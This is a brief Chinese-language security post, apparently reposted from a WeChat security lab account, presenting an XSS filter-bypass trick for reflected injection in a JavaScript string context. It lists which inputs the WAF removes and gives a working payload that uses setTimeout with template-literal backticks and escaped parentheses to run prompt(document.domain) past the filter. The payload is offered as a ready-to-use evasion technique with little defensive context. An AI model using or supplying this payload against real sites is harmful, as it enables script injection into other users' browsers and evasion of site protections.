奇技淫巧(10) - XSS payload

  • A+
所属分类:安全文章


XSS WAF绕过:

        在JS上下文中进行反射,允许使用单引号


<, > ==> REMOVED '-anything()-' ==> '-anything-' '-alert()-' ==> REMOVED '-setTimeout``-' = allowed


Payload: '-setTimeout`promptu0028document.domainu0029`-'



本文始发于微信公众号(Khan安全攻防实验室):奇技淫巧(10) - XSS payload

发表评论